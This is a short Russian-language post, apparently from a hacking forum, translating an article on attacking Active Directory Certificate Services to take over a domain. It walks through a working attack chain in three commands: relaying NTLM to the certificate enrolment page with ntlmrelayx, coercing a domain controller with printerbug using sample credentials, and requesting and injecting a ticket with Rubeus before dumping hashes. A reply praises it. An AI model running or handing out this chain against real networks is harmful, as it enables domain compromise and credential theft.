• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Атака на службу сертификатов AD для получения привилегий управления доменом

0x0021h

RAID-массив
Пользователь
Регистрация
14.11.2021
Сообщения
53
Решения
1
Реакции
78
Злоумышленник может использовать NTLM Over HTTP для выполнения атаки ntlmrelay.

Обычные разрешения пользователя по умолчанию:
1642412774326.png


impacket:
https://github.com/SecureAuthCorp/impacket

Атакующая машина включает прослушивание:
Код:
ntlmrelayx.py -t http://192.168.8.144/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'

Использование служб принтера:
Код:
python printerbug.py domain.org/user:password@192.168.8.155 192.168.8.164

1642412881771.png


Получение tgt с помощью сертификатов и инъекций:
Код:
Rubeus.exe asktgt /user:SRV-DC2$ /certificate:certificatebase64body /ptt
1642412952905.png


dump hash:
1642412989117.png


Автор: Jumbo
Переводчик: 0x0021h
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Блестяще
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх